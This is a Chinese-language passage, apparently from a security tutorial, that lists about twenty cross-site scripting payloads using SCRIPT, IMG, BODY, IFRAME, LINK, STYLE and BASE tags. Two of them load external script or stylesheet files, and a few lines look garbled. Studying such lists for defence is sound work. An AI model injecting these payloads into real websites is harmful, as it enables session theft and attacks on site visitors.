常见的XSS攻击方式列举如下,XSS的攻击方式非常多样,有兴趣的读者可以参考邱永华撰写的《XSS跨站脚本攻击剖析与防御》。
普通的XSS JavaScript注入,代码如下:
<SCRIPT SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>
IMG标签,代码如下:
<IMG SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>
IMG标签无分号无引号,代码如下:
<IMG SRC=javascript:alert('XSS')>
fromCharCode函数,代码如下:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
BODY BACKGROUND,代码如下:
<BODY BACKGROUND="javascript:alert('XSS')">
BODY标签,代码如下:
<BODY('XSS')>
IMG Lowsrc,代码如下:
<IMG LOWSRC="javascript:alert('XSS')">
BGSOUND,代码如下:
<BGSOUND SRC="javascript:alert('XSS');">
STYLE sheet,代码如下:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
远程样式表,代码如下:
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
IMG VBscript,代码如下:
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
Iframe标签,代码如下:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Table标签,代码如下:
<TABLE BACKGROUND="javascript:alert('XSS')">
TD标签,代码如下:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
DIV background-image,代码如下:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV expression,代码如下:
<DIV STYLE="width: expression_r(alert('XSS'));">
STYLE background-image,代码如下:
<STYLE>.XSS{background-image:url("javascript:alert('XSS')”);}</STYLE><A CLASS=XSS></A>
STYLE background,代码如下:
<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")} </STYLE>
使用BASE标签,代码如下:
<BASE HREF="javascript:alert('XSS');//">